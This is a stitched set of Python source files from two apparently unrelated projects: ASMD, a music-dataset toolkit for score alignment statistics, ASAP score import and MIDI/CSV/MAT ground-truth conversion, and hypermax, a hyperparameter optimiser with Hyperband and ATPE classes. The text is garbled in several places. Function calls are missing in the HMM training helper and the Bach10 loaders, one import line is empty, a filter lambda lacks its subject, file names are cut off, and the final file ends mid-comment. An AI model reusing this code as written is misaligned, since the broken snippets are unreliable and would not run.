gaussian mixtures n_mix=30, # the number of hidden states covariance_type=covariance_type, n_iter=n_iter, tol=tol, verbose=True, random_state=self.seed()) self.durhmm = GMMHMM( n_components=2, n_mix=3, covariance_type=covariance_type, n_iter=n_iter, tol=tol, verbose=True, random_state=self.seed()) def get_random_onset_diff(self, k=1): x, _state_seq = self.onshmm.sample(k, random_state=self.seed()) return x[:, 0] def get_random_duration_ratio(self, k=1): x, _state_seq = self.durhmm.sample(k, random_state=self.seed()) return x[:, 0] def train_on_filled_stats(self): super().train_on_filled_stats() # train the hmms def train(hmm, data, lengths):, lengths) if (hmm.monitor_.converged): print("hmm converged!") else: print("hmm did not converge!") print("Training duration hmm...") train(self.durhmm, self.dur_ratios, self.dur_lengths) print("Training onset hmm...") train(self.onshmm, self.ons_diffs, self.ons_lengths) def __repr__(self): return str(type(self)) def get_matching_scores(dataset: Dataset, i: int) -> Tuple[np.ndarray, np.ndarray]: """ Get a sub-scores of matching notes between `score` and the mos precisely aligned data available for song at index `i` Returns aligned, score """ mat_aligned = get_score_mat( dataset, i, score_type=['precise_alignment', 'broad_alignment']) mat_score = get_score_mat(dataset, i, score_type=['score']) # stretch to the same average BPM mat_stretch(mat_score, mat_aligned) # changing float pitches to nearest pitch mat_aligned[:, 0] = np.round(mat_aligned[:, 0]) mat_score[:, 0] = np.round(mat_score[:, 0]) # apply Eita method matching_notes = get_matching_notes(mat_score, mat_aligned, timeout=20) if matching_notes is None: raise RuntimeError("Cannot match notes for this score!") return mat_score[matching_notes[:, 0]], mat_aligned[matching_notes[:, 1]] def _get_random_value_from_hist(hist, k=1, max_value=None, hmm=False): """ Given a histogram (tuple returned by np.histogram), returns a random value picked with uniform distribution from a bin of the histogram. The bin is picked following the histogram distribution. If `max` is specified, the histogram is first normalized so that the maximum absolute value is the one specified. """ if max_value: values = minmax_scale(hist[1], (-abs(max_value), abs(max_value))) else: values = hist[1] start = choices(values[:-1], weights=hist[0], k=k) bin_w = abs(values[1] - values[0]) end = np.array(start) + bin_w return np.asarray([uniform(start[i], end[i]) for i in range(len(start))]) def evaluate(dataset: Dataset, stats: List[Stats]): """ Computes classical DTW over all datasets and returns avarage and standard deviation of all the DTW distances for each `Stats` object in stats This function will also need to install the dtw-python module separately """ global process_ def process_(i: int, dataset: Dataset, stat: Stats): # reset the stats for a new song stat.new_song() try: # take the matching notes in the score score, aligned = get_matching_scores(dataset, i) except RuntimeError: # skipping if cannot match notes return -1, -1 # take random standardized differences aligned_diff = stat.get_random_onset_diff(k=score.shape[0]) song_ons_diff = score[:, 1] - aligned[:, 1] # computing meang and dev from the matching notes mean = np.mean(song_ons_diff) std = np.std(song_ons_diff) # computing the estimated ons ons = np.sort(aligned[:, 1] + aligned_diff * std + mean) # computing estmated offs dur_ratios = stat.get_random_duration_ratio(k=score.shape[0]) song_dur = (aligned[:, 2] - aligned[:, 1]) song_dur_ratio = song_dur / (score[:, 2] - score[:, 1]) # computing meang and dev from the matching notes mean = np.mean(song_dur_ratio) std = np.std(song_dur_ratio) # computing the estimated offs est_ratios = dur_ratios * std + mean new_dur = song_dur / est_ratios offs = ons + new_dur fix_offsets(ons, offs, score[:, 0]) # DTW between score and affinely transformed new times offs_dist = np.abs(offs - score[:, 2]).mean() ons_dist = np.abs(ons - score[:, 1]).mean() return ons_dist, offs_dist for stat in stats: print(f"Evaluating {stat}") distances = dataset.parallel( process_, # type: ignore stat, n_jobs=NJOBS, max_nbytes=None, backend="multiprocessing") # removing scores where we couldn't match notes distances = np.asarray(distances) valid_scores = np.count_nonzero(distances[:, 0] > 0) print( f"Used {valid_scores / len(dataset)} scores ({valid_scores} / {len(dataset)})" ) distances = distances[distances[:, 0] >= 0] print(f"Statics for {stat} and Onsets") print(f"Avg: {np.mean(distances[:, 0]):.2e}") print(f"Std {np.std(distances[:, 0]):.2e}") print(f"Statics for {stat} and Offsets") print(f"Avg: {np.mean(distances[:, 1]):.2e}") print(f"Std {np.std(distances[:, 1]):.2e}") def get_stats(method='histogram', save=True, train=True): """ Computes statistics, histogram, dumps the object to file and returns it """ if os.path.exists(FILE_STATS): return pickle.load(open(os.path.join(FILE_STATS), "rb")) elif train: dataset = _get_dataset() print("Computing statistics") stats = Stats() stats.fill_stats(dataset) return _train_model(stats, method, save) else: return None def _get_dataset(): dataset = Dataset() # dataset = filter(dataset, # datasets=['Bach10', 'traditional_flute', 'MusicNet'], # copy=True) dataset = union( filter(dataset, datasets=[ 'vienna_corpus', 'Bach10', 'traditional_flute', 'MusicNet' ], copy=True), filter(dataset, datasets=['Maestro'], groups=['asap'], copy=True)) return dataset def _train_model(stats: Stats, method: str, save: bool): if method == 'histogram': stats = HistStats(stats=stats) elif method == 'hmm': stats = HMMStats(stats=stats) stats.train_on_filled_stats() if save: print("Saving statistical model") if os.path.exists(FILE_STATS): os.remove(FILE_STATS) pickle.dump(stats, open(FILE_STATS, 'wb')) return stats if __name__ == '__main__': dataset = _get_dataset() print("Computing statistics") stats = Stats() trainset, testset = choice(dataset, p=[0.7, 0.3], random_state=stats.seed()) stats.fill_stats(trainset) for method in ['hmm', 'histogram']: model = _train_model(stats, method, False) # stat = pickle.load( # open(os.path.join(THISDIR, "_alignment_stats.pkl"), "rb")) evaluate(testset, [ model, ]) ``` #### File: ASMD/asmd/ ```python import argparse import csv import json import tempfile import zipfile from pathlib import Path from typing import List, Mapping, Set, Tuple from urllib.request import urlretrieve, urlcleanup from alive_progress import alive_bar import shutil from .asmd import Dataset from .dataset_utils import filter from .idiot import THISDIR ASAP_URL = "" def modify_maestro_definifion(index: List[Tuple[Path, Path]]) -> Mapping: """ This function was run only once to add the proper group `asap` to the `Maestro` dataset """ # create a daset for loading the Maestro definition dataset = Dataset() for definition in dataset.datasets: if definition['name'] == 'Maestro': break # convert index to Set of string for faster search (the `in` operation) _index: List[str] = [str(e[0]) for e in index] install_dir = Path(dataset.install_dir) # add `asap` to each song with ground_truth in the index for song in definition['songs']: path = str((install_dir / song['recording']['path'][0]).with_suffix('')) if path in _index: song['groups'].append("asap") del song['included'] del definition['included'] return definition def download_asap() -> tempfile.TemporaryDirectory: """ Download ASAP from github. return the Path to the downloaded dir """ # downloading print("Downloading ASAP") asap_dir = tempfile.TemporaryDirectory() with alive_bar(unknown='notes2', spinner='notes_scrolling') as bar: temp_fn, _header = urlretrieve(ASAP_URL, reporthook=lambda x, y, z: bar) print("Uncompressing ASAP") with zipfile.ZipFile(temp_fn, 'r') as zip_ref: zip_ref.extractall(str(asap_dir)) urlcleanup() return asap_dir def make_index(asap_path: Path) -> List[Tuple[Path, Path]]: """ Generate a list of tuples with values: Maestro midi paths, ASAP midi score path """ # a random path inside asmd dataset = Dataset() asmd_maestro_random_path = filter(dataset, datasets=['Maestro']).get_gts_paths(0)[0] # the second occurrence of `/` in the random path _idx = asmd_maestro_random_path.index('/', asmd_maestro_random_path.index('/') + 1) # construct path to asmd Maestro asmd_maestro = Path(dataset.install_dir) / asmd_maestro_random_path[:_idx] out: List[Tuple[Path, Path]] = [] # this glob allows to abstracting over directory structure and names for fname in asap_path.glob('**/metadata.csv'): with open(fname) as f: for row in csv.DictReader(f): maestro_path = row['maestro_midi_performance'] if maestro_path: out.append( (Path(maestro_path.replace('{maestro}', str(asmd_maestro))).with_suffix(''), fname.parent / row['midi_score'])) return out def copy_scores(index: List[Tuple[Path, Path]]): """ Moves the scores in `index` to the Maestro path using `.score.mid` extension """ # moving files for maestro, asap in index: shutil.copy(asap, maestro.with_suffix('.score.mid')) if __name__ == '__main__': argparser = argparse.ArgumentParser() argparser.add_argument("-m", "--modify", action='store_true') args = argparser.parse_args() asap_dir = download_asap() try: index = make_index(Path(str(asap_dir))) if args.modify: new_def = modify_maestro_definifion(index) json.dump(new_def, open(Path(THISDIR) / 'definitions' / 'Maestro.json', 'wt'), indent=4) else: copy_scores(index) finally: shutil.rmtree(Path(str(asap_dir)).parent.parent) ``` #### File: ASMD/asmd/ ```python import csv import os import re from copy import deepcopy from functools import wraps import numpy as np import pretty_midi import from . import utils def convert(exts, no_dot=True, remove_player=False): """ This function is designed to be used as decorators for functions which converts from a filetype to our JSON format. Example of usage: >>> @convert(['.myext'], no_dot=True, remove_player=False) ... def function_which_converts(...): ... pass Parameters --- * ext : list of str the possible extensions of the ground-truths to be converted, e.g. ['.mid', '.midi']. You can also use this parameter to remove exceeding parts at the end of the filename (see `from_bach10_mat` and `from_bach10_f0` source code) * no_dot : boolean if True, don't add a dot before of the extension, if False, add it if not present; this is useful if you are using the extension to remove other parts in the file name (see `ext`). * remove_player : boolean if True, remove the name of the player in the last part of the file name: use this for the `traditional_flute` dataset; it will remove the part after the last '_'. """ def _convert(user_convert): @wraps(user_convert) def func(input_fn, *args, **kwargs): for ext in exts: new_fn = change_ext(input_fn, ext, no_dot, remove_player) if os.path.exists(new_fn): break out = user_convert(new_fn, *args, **kwargs) if type(out) is dict: out = [out] return out return func return _convert prototype_gt = { "precise_alignment": { "onsets": [], "offsets": [], "pitches": [], "notes": [], "velocities": [] }, "misaligned": { "onsets": [], "offsets": [], "pitches": [], "notes": [], "velocities": [] }, "score": { "onsets": [], "offsets": [], "pitches": [], "notes": [], "velocities": [], "beats": [] }, "broad_alignment": { "onsets": [], "offsets": [], "pitches": [], "notes": [], "velocities": [] }, "missing": [], "extra": [], "f0": [], "soft": { "values": [], "times": [] }, "sostenuto": { "values": [], "times": [] }, "sustain": { "values": [], "times": [] }, "instrument": 255, } """ The dictionary prototype for containing the ground_truth. use: >>> from copy import deepcopy ... from convert_from_file import prototype_gt ... prototype_gt = deepcopy(prototype_gt) >>> prototype_gt { "precise_alignment": { "onsets": [], "offsets": [], "pitches": [], "notes": [], "velocities": [] }, "misaligned": { "onsets": [], "offsets": [], "pitches": [], "notes": [], "velocities": [] }, "score": { "onsets": [], "offsets": [], "pitches": [], "notes": [], "velocities": [], "beats": [] }, "broad_alignment": { "onsets": [], "offsets": [], "pitches": [], "notes": [], "velocities": [] }, "f0": [], "soft": { "values": [], "times": [] }, "sostenuto": { "values": [], "times": [] }, "sustain": { "values": [], "times": [] }, "instrument": 255, } Note: ``pitches``, ``velocities``, ``sustain``, ``sostenuto``, ``soft``, and (if available) ``instrument`` must be in range [0, 128) """ def change_ext(input_fn, new_ext, no_dot=False, remove_player=False): """ Return the input path `input_fn` with `new_ext` as extension and the part after the last '-' removed. If `no_dot` is True, it will not add a dot before of the extension, otherwise it will add it if not present. `remove_player` can be used to remove the name of the player in the last part of the file name when: use this for the `traditional_flute` dataset; it will remove the last part after '_'. """ root = input_fn[:input_fn.rfind('-')] if remove_player: root = root[:root.rfind('_')] if not new_ext.startswith('.'): if not no_dot: new_ext = '.' + new_ext return root + new_ext def _sort_lists(*lists): """ Sort multiple lists in-place with reference to the first one """ idx = list(range(len(lists[0]))) idx.sort(key=lists[0].__getitem__) for i in range(len(lists)): if len(lists[i]) > 0: lists[i][:] = map(lists[i].__getitem__, idx) def _sort_alignment(alignment, data): """ Sort `data` in `alignment` (in-place) """ _sort_lists(data[alignment]['onsets'], data[alignment]['pitches'], data[alignment]['offsets'], data[alignment]['velocities'], data[alignment]['notes']) def _sort_pedal(data): """ Sort pedal for `data` (in-place) """ for cc_name in ['soft', 'sustain', 'sostenuto']: _sort_lists(data[cc_name]['times'], data[cc_name]['values']) def from_midi(midi_fn, alignment='precise_alignment', pitches=True, velocities=True, merge=True, beats=False): """ Open a midi file `midi_fn` and convert it to our ground_truth representation. This fills velocities, pitches, beats, sustain, soft, sostenuto and alignment (default: `precise_alignment`). Returns a list containing a dictionary. `alignment` can also be `None` or `False`, in that case no alignment is filled. If `merge` is True, the returned list will contain a dictionary for each track. Beats are filled according to tempo changes. This functions is decorated with 3 different sets of parameters: * `from_midi` is the decorated version with `remove_player=False` * `from_midi_remove_player` is the decorated version with `remove_player=True` * `from_midi_asap` is the decorated version which accept extension '.score.mid' which is used in the script to import scores from ASAP N.B. To allow having some annotation for subgroups of a dataset, this function returns None when it cannot find the specified midi file; in this way, that file is not taken into account while merging the various annotations (e.g. asap group inside Maestro dataset) """ try: pm = pretty_midi.PrettyMIDI(midi_fn) except FileNotFoundError: return None out = list() if merge: data = deepcopy(prototype_gt) for track in pm.instruments: if not merge: data = deepcopy(prototype_gt) for cc in track.control_changes: if cc.number == 64: cc_name = 'sustain' elif cc.number == 66: cc_name = 'sostenuto' elif cc.number == 67: cc_name = 'soft' else: continue data[cc_name]['values'].append(cc.value) data[cc_name]['times'].append(cc.time) for note in track.notes: if pitches: data[alignment]["pitches"].append(note.pitch) if velocities: data[alignment]["velocities"].append(note.velocity) if alignment: data[alignment]["onsets"].append(float(note.start)) data[alignment]["offsets"].append(float(note.end)) if beats and alignment == 'score': data[alignment]["beats"] = sorted(pm.get_beats().tolist()) if not merge: _sort_pedal(data) _sort_alignment(alignment, data) out.append(data) if merge: _sort_pedal(data) _sort_alignment(alignment, data) out.append(data) return out from_midi_remove_player = convert(['.mid', '.midi'], remove_player=True)(from_midi) from_midi_asap = convert(['.score.mid'], remove_player=False)(from_midi) # N.B. this one must be the last one, otherwise the previous modify the already decorated function! from_midi = convert(['.mid', '.midi'], remove_player=False)(from_midi) @convert(['.txt']) def from_phenicx_txt(txt_fn): """ Open a txt file `txt_fn` in the PHENICX format and convert it to our ground_truth representation. This fills: `broad_alignment`. """ out_list = list() with open(txt_fn) as f: lines = f.readlines() out = deepcopy(prototype_gt) for line in lines: fields = re.split(',|\n', line) out["broad_alignment"]["notes"].append(fields[2]) out["broad_alignment"]["pitches"].append( pretty_midi.note_name_to_number(fields[2])) out["broad_alignment"]["onsets"].append(float(fields[0])) out["broad_alignment"]["offsets"].append(float(fields[1])) _sort_alignment("broad_alignment", out) out_list.append(out) return out_list @convert(['-GTNotes.mat'], no_dot=True) def from_bach10_mat(mat_fn, sources=range(4)): """ Open a txt file `txt_fn` in the MIREX format (Bach10) and convert it to our ground_truth representation. This fills: `precise_alignment`, `pitches`. `sources` is an iterable containing the indices of the sources to be considered, where the first source is 0. Returns a list of dictionary, one per source. """ out_list = list() mat =['GTNotes'] for i in range(len(mat)): out = deepcopy(prototype_gt) source = mat[i, 0] for j in range(len(source)): note = source[j, 0] out["precise_alignment"]["pitches"].append( np.median(np.rint(note[1, :]))) out["precise_alignment"]["onsets"].append( (note[0, 0] - 2) * 10 / 1000.) out["precise_alignment"]["offsets"].append( (note[0, -1] - 2) * 10 / 1000.) _sort_alignment("precise_alignment", out) out_list.append(out) return out_list @convert(['-GTF0s.mat'], no_dot=True) def from_bach10_f0(nmat_fn, sources=range(4)): """ Open a matlab mat file `nmat_fn` in the MIREX format (Bach10) for frame evaluation and convert it to our ground_truth representation. This fills: `f0`. `sources` is an iterable containing the indices of the sources to be considered, where the first source is 0. Returns a list of dictionary, one per source. """ out_list = list() f0s =['GTF0s'] for source in sources: out = deepcopy(prototype_gt) out["f0"] = f0s[source].tolist() out_list.append(out) return out_list @convert(['.csv']) def from_musicnet_csv(csv_fn, sr=44100.0): """ Open a csv file `csv_fn` and convert it to our ground_truth representation. This fills: `broad_alignment`, `score`, `pitches`. This returns a list containing only one dict. `sr` is the samplerate of the audio files (MusicNet csv contains the sample number as onset and offsets of each note) and it shold be a float. N.B. MusicNet contains wav files at 44100 Hz as samplerate. N.B. Lowest in pitch in musicnet is 21, so we assume that they count pitch starting with 0 as in standard. N.B. `score` times are provided with BPM 60 for all the scores """ data = csv.reader(open(csv_fn), delimiter=',') out = deepcopy(prototype_gt) # skipping first line next(data) for row in data: # converting everything to float, except the last onw that is the # duration name as string row = list(map(float, row[:-1])) out["broad_alignment"]["onsets"].append(int(row[0]) / sr) out["broad_alignment"]["offsets"].append(int(row[1]) / sr) out["instrument"] = int(row[2]) out["broad_alignment"]["pitches"].append(int(row[3])) out["score"]["pitches"].append(int(row[3])) out["score"]["onsets"].append(float(row[4])) out["score"]["offsets"].append(float(row[4]) + float(row[5])) out["score"]["beats"] = [ i for i in range(int(max(out["score"]["offsets"])) + 1) ] _sort_alignment('score', out) _sort_alignment('broad_alignment', out) return out @convert(['.gt']) def from_sonic_visualizer(gt_fn, alignment='precise_alignment'): """ Takes a filename of a sonic visualizer output file exported as 'csv' and fills the 'alignment' specified """ min_midi_freq = utils.midi_pitch_to_f0(0) data = csv.reader(open(gt_fn), delimiter=',') out = deepcopy(prototype_gt) for row in data: p = float(row[1]) if p < min_midi_freq: continue out[alignment]["onsets"].append(float(row[0])) out[alignment]["offsets"].append(float(row[0]) + float(row[2])) pitch = utils.f0_to_midi_pitch(p) out[alignment]["pitches"].append(pitch) _sort_alignment(alignment, out) return out ```
{ "source": "00sapo/hypermax", "score": 2 }
#### File: hypermax/algorithms/ ```python import numpy as np import random from math import log, ceil from time import time, ctime from .optimization_algorithm_base import OptimizationAlgorithmBase from .random_search_optimizer import RandomSearchOptimizer from pprint import pprint from ..hyperparameter import Hyperparameter import hyperopt import json import functools import copy class AdaptiveBayesianHyperband(OptimizationAlgorithmBase): """ This algorithm combines our ATPE optimizer with Hyperband""" def __init__(self, baseOptimizer, min_budget, max_budget, eta = 3): self.baseOptimizer = baseOptimizer self.randomOptimizer = RandomSearchOptimizer() self.min_budget = min_budget self.max_budget = max_budget # maximum iterations per configuration self.eta = eta # defines configuration downsampling rate (default = 3) self.logeta = lambda x: log(x) / log(self.eta) self.s_max = int(self.logeta(self.max_budget)) self.B = (self.s_max + 1) * self.max_budget self.results = [] # list of dicts @classmethod def configurationSchema(self): return {} def createBudgetSchedule(self): runs = [] for s in reversed( range( self.s_max + 1 )): # initial number of configurations n = self.B / self.max_budget / (s + 1) * self.eta ** s # initial amount of budget per config r = self.max_budget * self.eta ** (-s) runs_in_sequence = 0 if round(r) >= self.min_budget: for i in range(( s + 1 )): # Run each of the n configs for <iterations> # and keep best (n_configs / eta) configurations n_configs = n * self.eta ** ( -i ) n_budget = r * self.eta ** ( i ) runs.append({ "group": s, "round": runs_in_sequence, "configs_start": int(round(n_configs)), "configs_finish": int(round(n_configs / self.eta)), "input_configs": int(round(n_configs * self.eta)), "input_round": runs_in_sequence - 1, "input_budget": -1 if i == 0 else int(ceil(r * self.eta ** ( i - 1 ))), "budget": int(round(n_budget)) }) runs_in_sequence += 1 return runs # return self.results def createCanonicalStringFromResult(self, result, hyperparameterSpace): params = Hyperparameter(hyperparameterSpace).convertToStructuredValues(result) keys = list(params.keys()) for key in keys: if key in OptimizationAlgorithmBase.resultInformationKeys or key.startswith('$'): del params[key] return json.dumps(params, sort_keys=True) def createCanonicalStringFromParameters(self, params, hyperparameterSpace): newResult = Hyperparameter(hyperparameterSpace).convertToFlatValues(params) return self.createCanonicalStringFromResult(newResult, hyperparameterSpace) def recommendNextParameters(self, hyperparameterSpace, results, currentTrials, lockedValues=None): runs = self.createBudgetSchedule() space = Hyperparameter(hyperparameterSpace) finishedAndRunningResults = [result for result in results if result['loss'] is not None] + [space.convertToFlatValues(trial['params']) for trial in currentTrials] runsNeeded = [] loopResults = [] loop = None # Find which is the largest $loop we find in the results if len(finishedAndRunningResults) == 0: loop = 0 runsNeeded = sorted(runs, key=lambda run: run['budget']) else: maxLoop = max([result['$loop'] for result in finishedAndRunningResults]) for loopToTest in range(maxLoop+1): loopResults = [result for result in finishedAndRunningResults if result['$loop'] == loopToTest] # Define which secondary halving runs have enough data to operate runsNeeded = [] for run in runs: if run['input_round'] != -1: inputResultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['input_round'] and ('loss' in result))] if len(inputResultsForRun) < run['input_configs']: continue resultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['round'])] if len(resultsForRun) < run['configs_start']: runsNeeded.append(run) runsNeeded = sorted(runsNeeded, key=lambda run: (-run['group'], -run['budget'])) if len(runsNeeded) > 0: loop = loopToTest break if loop is None: loop = maxLoop if len(runsNeeded) == 0: runsNeeded = sorted(runs, key=lambda run: run['budget']) loop += 1 run = runsNeeded[0] if run['input_round'] == -1: resultsForReccomendation = [result for result in results if result['$budget'] == run['budget']] if random.uniform(0, 1) < 0.3: params = self.randomOptimizer.recommendNextParameters(hyperparameterSpace, resultsForReccomendation, currentTrials) else: params = self.baseOptimizer.recommendNextParameters(hyperparameterSpace, resultsForReccomendation, currentTrials) params['$budget'] = run['budget'] params['$loop'] = loop params['$group'] = run['group'] params['$round'] = run['round'] return params else: inputResultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['input_round'])] inputResultsForRun = sorted(inputResultsForRun, key=lambda result: result['loss'])[0:run['configs_start']] existingResultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['round'])] inputCanonicalStrings = [self.createCanonicalStringFromResult(result, hyperparameterSpace) for result in inputResultsForRun] existingCanonicalStrings = [self.createCanonicalStringFromResult(result, hyperparameterSpace) for result in existingResultsForRun] neededCanonicalStrings = set(inputCanonicalStrings).difference(existingCanonicalStrings) neededResults = [inputResultsForRun[inputCanonicalStrings.index(resultString)] for resultString in neededCanonicalStrings] chosenResult = random.choice(neededResults) params = space.convertToStructuredValues(chosenResult) params['$budget'] = run['budget'] params['$loop'] = loop params['$group'] = run['group'] params['$round'] = run['round'] return params ``` #### File: hypermax/algorithms/ ```python from .optimization_algorithm_base import OptimizationAlgorithmBase import hyperopt import functools import random import numpy import numpy.random import json import pkg_resources from hypermax.hyperparameter import Hyperparameter import sklearn import lightgbm import scipy.stats import math from pprint import pprint import copy import hypermax.file_utils class ATPEOptimizer(OptimizationAlgorithmBase): atpeParameters = [ 'gamma', 'nEICandidates', 'resultFilteringAgeMultiplier', 'resultFilteringLossRankMultiplier', 'resultFilteringMode', 'resultFilteringRandomProbability', 'secondaryCorrelationExponent', 'secondaryCorrelationMultiplier', 'secondaryCutoff', 'secondaryFixedProbability', 'secondaryLockingMode', 'secondaryProbabilityMode', 'secondaryTopLockingPercentile', ] atpeParameterCascadeOrdering = [ 'resultFilteringMode', 'secondaryProbabilityMode', 'secondaryLockingMode', 'resultFilteringAgeMultiplier', 'resultFilteringLossRankMultiplier', 'resultFilteringRandomProbability', 'secondaryTopLockingPercentile', 'secondaryCorrelationExponent', 'secondaryCorrelationMultiplier', 'secondaryFixedProbability', 'secondaryCutoff', 'gamma', 'nEICandidates' ] atpeParameterValues = { 'resultFilteringMode': ['age', 'loss_rank', 'none', 'random'], 'secondaryLockingMode': ['random', 'top'], 'secondaryProbabilityMode': ['correlation', 'fixed'] } atpeModelFeatureKeys = [ 'all_correlation_best_percentile25_ratio', 'all_correlation_best_percentile50_ratio', 'all_correlation_best_percentile75_ratio', 'all_correlation_kurtosis', 'all_correlation_percentile5_percentile25_ratio', 'all_correlation_skew', 'all_correlation_stddev_best_ratio', 'all_correlation_stddev_median_ratio', 'all_loss_best_percentile25_ratio', 'all_loss_best_percentile50_ratio', 'all_loss_best_percentile75_ratio', 'all_loss_kurtosis', 'all_loss_percentile5_percentile25_ratio', 'all_loss_skew', 'all_loss_stddev_best_ratio', 'all_loss_stddev_median_ratio', 'log10_cardinality', 'recent_10_correlation_best_percentile25_ratio', 'recent_10_correlation_best_percentile50_ratio', 'recent_10_correlation_best_percentile75_ratio', 'recent_10_correlation_kurtosis', 'recent_10_correlation_percentile5_percentile25_ratio', 'recent_10_correlation_skew', 'recent_10_correlation_stddev_best_ratio', 'recent_10_correlation_stddev_median_ratio', 'recent_10_loss_best_percentile25_ratio', 'recent_10_loss_best_percentile50_ratio', 'recent_10_loss_best_percentile75_ratio', 'recent_10_loss_kurtosis', 'recent_10_loss_percentile5_percentile25_ratio', 'recent_10_loss_skew', 'recent_10_loss_stddev_best_ratio', 'recent_10_loss_stddev_median_ratio', 'recent_15%_correlation_best_percentile25_ratio', 'recent_15%_correlation_best_percentile50_ratio', 'recent_15%_correlation_best_percentile75_ratio', 'recent_15%_correlation_kurtosis', 'recent_15%_correlation_percentile5_percentile25_ratio', 'recent_15%_correlation_skew', 'recent_15%_correlation_stddev_best_ratio', 'recent_15%_correlation_stddev_median_ratio', 'recent_15%_loss_best_percentile25_ratio', 'recent_15%_loss_best_percentile50_ratio', 'recent_15%_loss_best_percentile75_ratio', 'recent_15%_loss_kurtosis', 'recent_15%_loss_percentile5_percentile25_ratio', 'recent_15%_loss_skew', 'recent_15%_loss_stddev_best_ratio', 'recent_15%_loss_stddev_median_ratio', 'recent_25_correlation_best_percentile25_ratio', 'recent_25_correlation_best_percentile50_ratio', 'recent_25_correlation_best_percentile75_ratio', 'recent_25_correlation_kurtosis', 'recent_25_correlation_percentile5_percentile25_ratio', 'recent_25_correlation_skew', 'recent_25_correlation_stddev_best_ratio', 'recent_25_correlation_stddev_median_ratio', 'recent_25_loss_best_percentile25_ratio', 'recent_25_loss_best_percentile50_ratio', 'recent_25_loss_best_percentile75_ratio', 'recent_25_loss_kurtosis', 'recent_25_loss_percentile5_percentile25_ratio', 'recent_25_loss_skew', 'recent_25_loss_stddev_best_ratio', 'recent_25_loss_stddev_median_ratio', 'top_10%_correlation_best_percentile25_ratio', 'top_10%_correlation_best_percentile50_ratio', 'top_10%_correlation_best_percentile75_ratio', 'top_10%_correlation_kurtosis', 'top_10%_correlation_percentile5_percentile25_ratio', 'top_10%_correlation_skew', 'top_10%_correlation_stddev_best_ratio', 'top_10%_correlation_stddev_median_ratio', 'top_10%_loss_best_percentile25_ratio', 'top_10%_loss_best_percentile50_ratio', 'top_10%_loss_best_percentile75_ratio', 'top_10%_loss_kurtosis', 'top_10%_loss_percentile5_percentile25_ratio', 'top_10%_loss_skew', 'top_10%_loss_stddev_best_ratio', 'top_10%_loss_stddev_median_ratio', 'top_20%_correlation_best_percentile25_ratio', 'top_20%_correlation_best_percentile50_ratio', 'top_20%_correlation_best_percentile75_ratio', 'top_20%_correlation_kurtosis', 'top_20%_correlation_percentile5_percentile25_ratio', 'top_20%_correlation_skew', 'top_20%_correlation_stddev_best_ratio', 'top_20%_correlation_stddev_median_ratio', 'top_20%_loss_best_percentile25_ratio', 'top_20%_loss_best_percentile50_ratio', 'top_20%_loss_best_percentile75_ratio', 'top_20%_loss_kurtosis', 'top_20%_loss_percentile5_percentile25_ratio', 'top_20%_loss_skew', 'top_20%_loss_stddev_best_ratio', 'top_20%_loss_stddev_median_ratio', 'top_30%_correlation_best_percentile25_ratio', 'top_30%_correlation_best_percentile50_ratio', 'top_30%_correlation_best_percentile75_ratio', 'top_30%_correlation_kurtosis', 'top_30%_correlation_percentile5_percentile25_ratio', 'top_30%_correlation_skew', 'top_30%_correlation_stddev_best_ratio', 'top_30%_correlation_stddev_median_ratio', 'top_30%_loss_best_percentile25_ratio', 'top_30%_loss_best_percentile50_ratio', 'top_30%_loss_best_percentile75_ratio', 'top_30%_loss_kurtosis', 'top_30%_loss_percentile5_percentile25_ratio', 'top_30%_loss_skew', 'top_30%_loss_stddev_best_ratio', 'top_30%_loss_stddev_median_ratio' ] def __init__(self): scalingModelData = json.loads(pkg_resources.resource_string(__name__, "../atpe_models/scaling_model.json")) self.featureScalingModels = {} for key in self.atpeModelFeatureKeys: self.featureScalingModels[key] = sklearn.preprocessing.StandardScaler() self.featureScalingModels[key].scale_ = numpy.array(scalingModelData[key]['scales']) self.featureScalingModels[key].mean_ = numpy.array(scalingModelData[key]['means']) self.featureScalingModels[key].var_ = numpy.array(scalingModelData[key]['variances']) self.parameterModels = {} self.parameterModelConfigurations = {} for param in self.atpeParameters: modelData = pkg_resources.resource_string(__name__, "../atpe_models/model-" + param + '.txt') with hypermax.file_utils.ClosedNamedTempFile(modelData) as model_file_name: self.parameterModels[param] = lightgbm.Booster(model_file=model_file_name) configString = pkg_resources.resource_string(__name__, "../atpe_models/model-" + param + '-configuration.json') data = json.loads(configString) self.parameterModelConfigurations[param] = data self.lastATPEParameters = None self.lastLockedParameters = [] self.atpeParamDetails = None def recommendNextParameters(self, hyperparameterSpace, results, currentTrials, lockedValues=None): rstate = numpy.random.RandomState(seed=int(random.randint(1, 2 ** 32 - 1))) params = {} def sample(parameters): nonlocal params params = parameters return {"loss": 0.5, 'status': 'ok'} parameters = Hyperparameter(hyperparameterSpace).getFlatParameters() if lockedValues is not None: # Remove any locked values from ones the optimizer will examine parameters = list(filter(lambda param: not in lockedValues.keys(), parameters)) log10_cardinality = Hyperparameter(hyperparameterSpace).getLog10Cardinality() initializationRounds = max(10, int(log10_cardinality)) atpeParams = {} atpeParamDetails = {} if len(list(result for result in results if result['loss'])) < initializationRounds: atpeParams = { 'gamma': 1.0, 'nEICandidates': 24, 'resultFilteringAgeMultiplier': None, 'resultFilteringLossRankMultiplier': None, 'resultFilteringMode': "none", 'resultFilteringRandomProbability': None, 'secondaryCorrelationExponent': 1.0, 'secondaryCorrelationMultiplier': None, 'secondaryCutoff': 0, 'secondarySorting': 0, 'secondaryFixedProbability': 0.5, 'secondaryLockingMode': 'top', 'secondaryProbabilityMode': 'fixed', 'secondaryTopLockingPercentile': 0 } else: # Calculate the statistics for the distribution stats = self.computeAllResultStatistics(hyperparameterSpace, results) stats['num_parameters'] = len(parameters) stats['log10_cardinality'] = Hyperparameter(hyperparameterSpace).getLog10Cardinality() stats['log10_trial'] = math.log10(len(results)) baseVector = [] for feature in self.atpeModelFeatureKeys: scalingModel = self.featureScalingModels[feature] transformed = scalingModel.transform([[stats[feature]]])[0][0] baseVector.append(transformed) baseVector = numpy.array([baseVector]) for atpeParamIndex, atpeParameter in enumerate(self.atpeParameterCascadeOrdering): vector = copy.copy(baseVector)[0].tolist() atpeParamFeatures = self.atpeParameterCascadeOrdering[:atpeParamIndex] for atpeParamFeature in atpeParamFeatures: # We have to insert a special value of -3 for any conditional parameters. if atpeParamFeature == 'resultFilteringAgeMultiplier' and atpeParams['resultFilteringMode'] != 'age': vector.append(-3) # This is the default value inserted when parameters aren't 